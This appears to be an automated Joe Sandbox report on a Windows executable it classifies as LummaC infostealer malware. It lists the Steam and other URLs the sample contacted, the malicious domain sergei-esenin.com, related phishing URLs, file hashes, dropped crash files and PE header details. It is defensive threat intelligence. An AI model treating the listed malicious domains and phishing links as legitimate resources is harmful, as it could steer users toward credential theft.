                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://recaptcha.netfile.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://upx.sf.netAmcache.hve.12.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://store.steampowered.com/file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://127.0.0.1:27060file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQAfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://help.steampowered.com/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://api.steampowered.com/file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://store.steampowered.com/account/cookiepreferences/file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://store.steampowered.com/mobilefile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://steamcommunity.com/file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    104.21.53.8
                                                                                                    sergei-esenin.comUnited States
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    104.102.49.254
                                                                                                    steamcommunity.comUnited States
                                                                                                    16625AKAMAI-ASUStrue
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1532742
                                                                                                    Start date and time:2024-10-13 21:03:10 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 4m 44s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:19
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:file.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.evad.winEXE@2/5@10/2
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:Failed
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target file.exe, PID 4836 because there are no executed function
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • VT rate limit hit for: file.exe
                                                                                                    TimeTypeDescription
                                                                                                    15:04:10API Interceptor4x Sleep call for process: file.exe modified
                                                                                                    16:39:59API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    104.21.53.8file.exeGet hashmaliciousLummaCBrowse
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                                    Setup-Premium.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                        104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 172.67.206.204
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUShttps://fexegreuyauja-8124.vercel.app/mixc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 172.67.75.166
                                                                                                                        https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 172.67.69.226
                                                                                                                        http://iglawfirm.com/services/antai-fr/Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        https://www.iglawfirm.com/services/antai-fr/infospage.phpGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.17.24.14
                                                                                                                        http://bancolombia-personas-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                        • 172.67.74.152
                                                                                                                        http://bancolombia-seguridad-co.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.26.12.205
                                                                                                                        http://telegiraum.club/Get hashmaliciousTelegram PhisherBrowse
                                                                                                                        • 104.16.124.96
                                                                                                                        https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.18.31.19
                                                                                                                        https://f120987.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.18.31.19
                                                                                                                        AKAMAI-ASUShttps://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                                        • 88.221.169.65
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunlty-gifts.com/s/HRABGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunity-success.com/gift-card/9376695162Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        https://steamcommunityv.com/redeemwalletcode/gift/514590383Get hashmaliciousUnknownBrowse
                                                                                                                        • 88.221.169.65
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.102.49.254
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.53.8
                                                                                                                        • 104.102.49.254
                                                                                                                        No context
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF, NEL line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):65536
                                                                                                                        Entropy (8bit):1.0584184473248526
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:P8C7IQwGqvFPlktS0BU/YP3juFjO8zuiF0Z24IO8TOB:KFN6ZBU/gjyzuiF0Y4IO8C
                                                                                                                        MD5:F1BBF9194E53FC7BF76D20AE7815D025
                                                                                                                        SHA1:F6E017433D33DF85D2DAAEF4B29956885ECB02FF
                                                                                                                        SHA-256:F54E00B3D5DE8B68A4B44E691BB27486D1CA777FFE71F4E78F97AD0FE87E4BA6
                                                                                                                        SHA-512:08D7A8CD721FDBBD9D1D942370D6DAB289B0A0E2264E2775755D160279AB38E73B9D8328C37E27490AAABC8EE52E895BC09B13AE31872828418816A1F01451B5
                                                                                                                        Malicious:true
                                                                                                                        Reputation:low
                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.1.9.8.5.4.3.1.3.6.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.1.9.8.5.5.6.1.0.5.5.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.2.7.2.d.5.7.-.b.f.a.4.-.4.a.a.e.-.a.b.a.f.-.f.a.c.7.d.f.e.e.1.2.2.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.a.f.d.3.c.1.2.-.5.3.4.1.-.4.b.4.a.-.8.5.f.e.-.0.4.4.3.b.6.9.6.d.7.e.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.e.4.-.0.0.0.1.-.0.0.1.4.-.6.5.3.c.-.9.8.a.e.a.2.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.a.3.d.a.b.4.2.e.c.e.d.8.c.f.0.6.8.b.d.6.9.e.c.c.5.6.8.a.5.b.d.2.b.1.d.f.c.f.8.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 19:04:15 2024, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):284824
                                                                                                                        Entropy (8bit):1.4661299366534766
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:RqexjGZm2zBUc8R1NlIwLuYJtQS0MaAg34sy:RqehGZm2zBq1NlIwLuYrQS0MaAgos
                                                                                                                        MD5:325330E72BADF03D2A76C4DA0EF02F7F
                                                                                                                        SHA1:56A17FFCF97C5CDC2100975E0D56CCFBE55E245C
                                                                                                                        SHA-256:0E55A74F4160970B0981BE5617C5C5D9B98D25BEF1017EFE269CB9AE70516D51
                                                                                                                        SHA-512:2E5597E2E3F596ABE15FF70DE12614EBC2A775ACCEB77F2CD8D267151275F02A76D3E994D707FE954E80F8FDA8D693B0BD1311B8DDB2A1A623BF7F33EAF6891A
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:MDMP..a..... ..........g........................T...........l...,'..........$...........`.......8...........T............I...............'...........)..............................................................................eJ.......*......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8296
                                                                                                                        Entropy (8bit):3.6945393315558235
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:R6l7wVeJbCA6Bt5kte6YNhSUcsgmfBGeDprI89b1bsfCXHm:R6lXJx6BbkU6Y7SUcsgmfZb1gfN
                                                                                                                        MD5:F3A868128FFE2795093D78E685E4B3B1
                                                                                                                        SHA1:529D5E07DFBB5A3FCDC29AAC01E25287124337D4
                                                                                                                        SHA-256:423238D47C9553924A108B31949D9EA92C565AB429EC496E6010B323149CB869
                                                                                                                        SHA-512:172B99237CC114750C1706A7C9C86D2F1A41267584B7FE1424DB28D0CFA704ED96E46CDBDE11875F3BACAB5B21F56CCF046DDD154056E0FC6B33ED8537D9692D
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.3.6.<./.P.i.
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4542
                                                                                                                        Entropy (8bit):4.427679053750554
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwWl8zsFtJg77aI9lyWpW8VYPYm8M4JjlFI7+q8CoNvWed:uIjfFHI7DT7VTJk7YNvWed
                                                                                                                        MD5:9715C4AB54873F3FBA75B5D47027E98F
                                                                                                                        SHA1:01DE7D7626E9C11C3AE449E7281B0381689333D5
                                                                                                                        SHA-256:28FD0A65EF0C0E34EE64132B71217392CBFD64099AB8027E7669FC381E1FE549
                                                                                                                        SHA-512:498A56F4C9034D147F49D4A5DFC754A1FB64810DDAEDD4B252DC060BA0CEF885447A1AEF172FE58CD74BCA2C1505517CCF3B1DC0859EF0A0706B1E986EC0CFE8
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542046" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1835008
                                                                                                                        Entropy (8bit):4.416535713314713
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:hcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:+i58oSWIZBk2MM6AFBqo
                                                                                                                        MD5:CA168D618185582A875176B9C8BF1CC6
                                                                                                                        SHA1:7A015AB385B3661F844A31A01FD3141604F1C71D
                                                                                                                        SHA-256:372C0C424F7BCE564E56B4968B05B6D6914D55D08C3662FB0993C671CC159A55
                                                                                                                        SHA-512:9CCA7EC00431042DF07D88A3B662A11432B4A76E33F25DB15CBCE7EF9FE0A72E4A16658F82E40F6869E8AF2CCC35A8CC3FC6BB905671B1B82D3862EC5AC93788
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm. .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):7.947628013475882
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:file.exe
                                                                                                                        File size:1'845'248 bytes
                                                                                                                        MD5:395a5c7fa6131d1a2ce4689ce9202399
                                                                                                                        SHA1:ea3dab42eced8cf068bd69ecc568a5bd2b1dfcf8
                                                                                                                        SHA256:14025c4c8400e3712ad13e69eeab48d32405795852013ae29c1cf8a25ce0169f
                                                                                                                        SHA512:d0c84672ee70272becc1a0a3520fb633846556b59847097de2713557d5f285eca073d6e9923da92541521593dd13c6c5dd03e2faf179bf54b0e738a52e5601fd
                                                                                                                        SSDEEP:49152:ZXEw/1uHVUqm+lxJu/tvklX+L43xEQEtBb:Z0w9KQ0ct8lXQ43E
                                                                                                                        TLSH:4E8533166D7269B9C67010337468D7893D3FD41280529E8F0E7A6226D02FE6F64D3FB9
                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................I...........@...........................I.....r.....@.................................W...k..
                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                        Entrypoint:0x89b000
                                                                                                                        Entrypoint Section:.taggant
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                        Instruction
                                                                                                                        jmp 00007F5100B3BB7Ah
                                                                                                                        clts
                                                                                                                        sbb al, 00h
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        jmp 00007F5100B3DB75h
                                                                                                                        add byte ptr [esi], al
                                                                                                                        or al, byte ptr [eax]
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], dh
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], ch
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
                                                                                                                        add byte ptr [eax], al
